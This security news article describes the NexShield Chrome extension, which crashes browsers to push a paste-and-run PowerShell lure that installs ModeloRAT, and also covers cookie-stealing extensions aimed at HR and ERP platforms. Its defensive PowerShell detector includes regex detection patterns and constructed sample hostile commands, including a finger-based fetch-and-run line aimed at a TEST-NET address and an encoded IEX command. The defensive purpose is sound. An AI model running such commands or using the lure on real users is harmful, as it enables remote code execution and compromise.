Chrome Extension Backdoor Disguised as Fake Crash Alerts

▼ Summary
– Browser extensions are a high-risk enterprise attack vector, as demonstrated by the malicious NexShield extension which delivered a remote access trojan (RAT) to corporate machines.
– The NexShield extension, a clone of uBlock Origin Lite, used social engineering to trick users into executing a malicious PowerShell command by displaying a fake security pop-up after crashing their browser.
– The attack specifically targeted domain-joined corporate machines to enable lateral movement and access to sensitive data, downloading the persistent ModeloRAT after system checks.
– Separate malicious extensions targeting enterprise HR and ERP platforms were found stealing authentication cookies, hijacking sessions, and blocking access to security administration pages.
– Enterprise admins can mitigate these risks by using extension allowlists, disabling Developer Mode, and monitoring installed extensions for malicious updates.
Browser extensions represent a significant and often underestimated security threat for businesses, providing a direct pathway for attackers to circumvent standard defenses and establish control over corporate devices. A recent incident involving a malicious extension called NexShield demonstrates how a single installation from an official store can lead to complete system compromise. Security analysts at Huntress discovered that this extension deploys a previously unknown Windows remote access trojan, specifically targeting domain-joined computers. These machines are critical corporate assets with access to internal networks, sensitive data, and directory services.
The attack began when users searching for an ad blocker were directed via Google Search to a convincing download page. The page fraudulently presented the “NexShield Smart Ad Blocker” as a product from Raymond Hill, the actual creator of the reputable uBlock Origin. Victims were then sent to the Chrome Web Store to install the extension, which has since been taken down. Researchers found the NexShield extension to be a near-exact copy of uBlock Origin Lite, modified to watch for its own installation event and to delay its malicious routine by an hour, a common way of slipping past store review and short-lived sandbox analysis.
The extension’s core deception is to crash the browser on purpose. It floods the browser with requests until it freezes. When the user force-quits and restarts, NexShield displays a counterfeit security alert labeled “CrashFix” that instructs the user to run a scan. A fake “Security issues detected” message follows, walking the victim through a manual “fix”: open the Windows Run dialog, paste from the clipboard, and press Enter. The extension has meanwhile silently written a malicious PowerShell command to the clipboard, presented as a legitimate repair script, so pressing Enter runs attacker-supplied code with the user’s own privileges and starts the infection chain.
If the pop-up is dismissed without removing the extension, the cycle repeats every ten minutes, a denial of service that continues until the user either gives in or uninstalls the add-on. The initial PowerShell command abuses `finger.exe`, a legitimate networking client that ships with Windows, as a living-off-the-land downloader to fetch further script stages and payloads from an attacker-controlled server; because the binary is already present on the host, the retrieval blends in with ordinary activity. Subsequent stages check for security analysis tools and virtual-machine indicators and determine whether the computer is joined to a corporate domain. Only if it is domain-joined does the script download a Python environment and the persistent ModeloRAT malware. This selective targeting indicates the threat actor’s focus on enterprise environments, where one compromised host can enable lateral movement, credential theft, and access to high-value assets.
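As an added illustration, not code from Huntress or from the article, the following PowerShell looks for the traces this paste-and-run lure (a pattern commonly called ClickFix) leaves on a Windows host: the Run dialog’s RunMRU history and PowerShell script block logs (event ID 4104). The indicator patterns are heuristics written for this example, not signatures from the campaign, and the sample entries are constructed; the TEST-NET address stands in for whatever server the real command contacted.

```powershell
# Added example (not from Huntress or the article): hunt for "Win+R, paste, Enter"
# execution on a Windows host. Assumptions: run in the affected user's context for
# RunMRU, elevated for the PowerShell operational log (script block logging on).

function Test-PasteAndRunIndicator {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Command)
    # Things a user never types into Run by hand but ClickFix lures depend on:
    # finger.exe used as a downloader, PowerShell with in-memory execution,
    # hidden windows or encoded arguments, mshta pulling a remote URL.
    # (-match is case-insensitive by default.)
    $patterns = @(
        'finger(\.exe)?\s+\S+@\S+',
        '(powershell|pwsh)\b.*(\biex\b|invoke-expression|downloadstring|frombase64string|\s-w(indowstyle)?\s+h|\s-e(nc|ncodedcommand)?\s)',
        'mshta\b.*https?://'
    )
    foreach ($p in $patterns) {
        if ($Command -match $p) { return $true }
    }
    return $false
}

function Get-SuspiciousRunMru {
    # RunMRU keeps what the user typed or pasted into the Run dialog.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    if (-not $props.MRUList) { return }
    # MRUList orders the slots most-recent-first (e.g. "cba"); each value ends in "\1".
    foreach ($slot in $props.MRUList.ToCharArray()) {
        $raw = $props.PSObject.Properties[[string]$slot].Value
        if (-not $raw) { continue }
        $cmd = $raw -replace '\\1$', ''
        if (Test-PasteAndRunIndicator -Command $cmd) {
            [pscustomobject]@{ Source = 'RunMRU'; When = 'n/a'; Command = $cmd }
        }
    }
}

function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24)
    # Event 4104: Properties[2] is the ScriptBlockText that actually executed.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $text = [string]$e.Properties[2].Value
        if (Test-PasteAndRunIndicator -Command $text) {
            $snippet = $text.Substring(0, [Math]::Min(160, $text.Length))
            [pscustomobject]@{ Source = 'EID4104'; When = $e.TimeCreated; Command = $snippet }
        }
    }
}

# Constructed sample Run-dialog entries (not the real NexShield command;
# 203.0.113.0/24 is TEST-NET). Only the two PowerShell entries should be flagged.
$sample = @(
    'notepad',
    '\\fileserver\share',
    'powershell -w h -c "finger user@203.0.113.5 | powershell"',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAuAC4ALgA='
)
$sample | ForEach-Object {
    [pscustomobject]@{ Command = $_; Suspicious = (Test-PasteAndRunIndicator -Command $_) }
} | Format-Table -AutoSize

# Live checks on this host:
Get-SuspiciousRunMru
Get-SuspiciousScriptBlocks -Hours 72
```

RunMRU is per user and survives a reboot, so it is worth collecting from every profile on a suspected machine; the 4104 check only works where script block logging is enabled, which is one more reason to turn it on fleet-wide before an incident.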
In a separate but related threat, analysts at Socket identified five additional malicious Chrome extensions aimed at enterprise platforms. These extensions, named DataByCloud 1, DataByCloud 2, DataByCloud Access, Software Access, and Tool Access 11, posed as productivity tools for major HR and ERP systems like Workday, NetSuite, and SAP SuccessFactors. Available on the Chrome Web Store and installed by over 2,300 users, they shared code and targeting patterns, pointing to a coordinated campaign. The extensions continuously harvest authentication cookies and exfiltrate them to remote servers, letting attackers replay the sessions and take over accounts without needing the password or a second factor. They also deliberately block access to security administration pages, preventing users from changing passwords, managing two-factor authentication, or adjusting security policies.
This creates a severe containment problem. Security teams may detect the abuse through alerts or user reports, but the usual remediation steps taken from the affected browser (password rotation, two-factor review, policy changes) are blocked. Organizations are then forced to choose between tolerating continued unauthorized access and undertaking the disruptive process of migrating affected users to entirely new accounts outside the compromised environment. An extension can only interfere with the browser it runs in, so removing it, or revoking the user’s sessions from an administrator console on an unaffected device, restores the blocked pages; the difficulty is that neither step happens until someone recognizes the extension as the cause.
For enterprise administrators, mitigating these risks requires a layered approach: technical controls, strict policy, and continuous monitoring. Prevent employees from installing unapproved extensions with a strict allowlist, and review an extension’s requested permissions and publisher before approving it. Disable Developer Mode in managed browsers so users cannot load unpacked or sideloaded extensions. Continuously inventory installed extensions, since even an approved one can turn malicious after an update. Staying informed through reliable security alerts is essential for responding swiftly to emerging threats.
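Added example, not from the article or from Google: PowerShell that applies the controls above on Windows and, for the cookie-stealing extensions described earlier, audits installed extensions for the permission combination that behaviour requires (cookie access on all sites plus the ability to block requests). The registry policy names are Chrome’s documented enterprise policies; the ExtensionDeveloperModeSettings value should be confirmed against the policy list for the Chrome version you deploy. The allowlisted IDs and the baseline path are placeholders.

```powershell
# Added example (not the article's or Google's code). Run elevated.
# 1. Enforce an extension allowlist and disable Developer Mode via HKLM policy.
# 2. Inventory every profile's installed extensions and flag risky capabilities.
# 3. Diff against a saved baseline to catch new installs and silent updates.

$ChromePolicy = 'HKLM:\SOFTWARE\Policies\Google\Chrome'

function Set-ChromeExtensionLockdown {
    param([Parameter(Mandatory)][string[]]$AllowedIds)
    New-Item -Path $ChromePolicy -Force | Out-Null
    # Blocklist "*" blocks every extension not explicitly allowlisted, including
    # installs from the official store.
    $block = "$ChromePolicy\ExtensionInstallBlocklist"
    New-Item -Path $block -Force | Out-Null
    Set-ItemProperty -Path $block -Name '1' -Value '*' -Type String
    $allow = "$ChromePolicy\ExtensionInstallAllowlist"
    if (Test-Path $allow) { Remove-Item -Path $allow -Recurse }   # rebuild from scratch
    New-Item -Path $allow -Force | Out-Null
    $n = 1
    foreach ($id in $AllowedIds) {
        Set-ItemProperty -Path $allow -Name "$n" -Value $id -Type String
        $n++
    }
    # 1 = disallow Developer Mode on chrome://extensions, removing "Load unpacked"
    # and the sideloading path with it. Assumption: policy name as in current
    # Chrome releases; verify against the policy list for your deployed version.
    Set-ItemProperty -Path $ChromePolicy -Name 'ExtensionDeveloperModeSettings' -Value 1 -Type DWord
}

function Get-ChromeExtensionInventory {
    param([string[]]$AllowedIds = @())
    $pattern = 'C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Extensions\*\*\manifest.json'
    foreach ($m in Get-ChildItem -Path $pattern -ErrorAction SilentlyContinue) {
        $id   = $m.Directory.Parent.Name              # ...\Extensions\<id>\<version>\manifest.json
        $user = ($m.FullName -split '\\')[2]
        try { $j = Get-Content -Raw -LiteralPath $m.FullName | ConvertFrom-Json } catch { continue }
        # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
        $perms = @($j.permissions) + @($j.optional_permissions) + @($j.host_permissions)
        $hosts = @($perms) + @($j.content_scripts | ForEach-Object { $_.matches })
        $broad    = [bool]($hosts -match '^(<all_urls>|\*://\*/\*|https?://\*/\*)$')
        $cookies  = $perms -contains 'cookies'
        $canBlock = [bool]($perms -match '^(declarativeNetRequest|declarativeNetRequestWithHostAccess|webRequestBlocking)$')
        $flags = @()
        if ($AllowedIds.Count -gt 0 -and $id -notin $AllowedIds) { $flags += 'NotAllowlisted' }
        if ($cookies -and $broad) { $flags += 'CookiesOnAllSites' }   # session-theft capable
        if ($canBlock)            { $flags += 'CanBlockRequests' }    # can hide security pages
        [pscustomobject]@{
            User = $user; Id = $id; Version = $m.Directory.Name
            Name = $j.name          # "__MSG_*__" means the name is localized under _locales/
            Flags = ($flags -join ',')
        }
    }
}

function Compare-ExtensionBaseline {
    param([Parameter(Mandatory)][string]$BaselinePath, [string[]]$AllowedIds = @())
    $now = @(Get-ChromeExtensionInventory -AllowedIds $AllowedIds)
    if (Test-Path $BaselinePath) {
        $old = @(Import-Clixml -Path $BaselinePath)
        if ($old.Count -gt 0) {
            # Anything on the "=>" side is a new ID or a changed version since the
            # last run, i.e. an install or an update that has not been reviewed.
            Compare-Object -ReferenceObject $old -DifferenceObject $now -Property User, Id, Version |
                Where-Object SideIndicator -eq '=>'
        }
    }
    $now | Export-Clixml -Path $BaselinePath
}

# Usage (placeholder IDs; real ones are 32 lowercase letters a-p from the store URL):
$approved = @('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb')
Set-ChromeExtensionLockdown -AllowedIds $approved
Get-ChromeExtensionInventory -AllowedIds $approved | Format-Table -AutoSize
Compare-ExtensionBaseline -BaselinePath "$env:ProgramData\chrome-ext-baseline.xml" -AllowedIds $approved
```

The inventory reads manifests straight from disk rather than asking the browser, so it still works when an extension is hiding its own management page. Schedule the baseline comparison to run after Chrome’s update window so that a benign extension that suddenly acquires `cookies` plus broad host access shows up as a version change with new flags, which is exactly the post-update compromise the text warns about.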
(Source: HelpNet Security)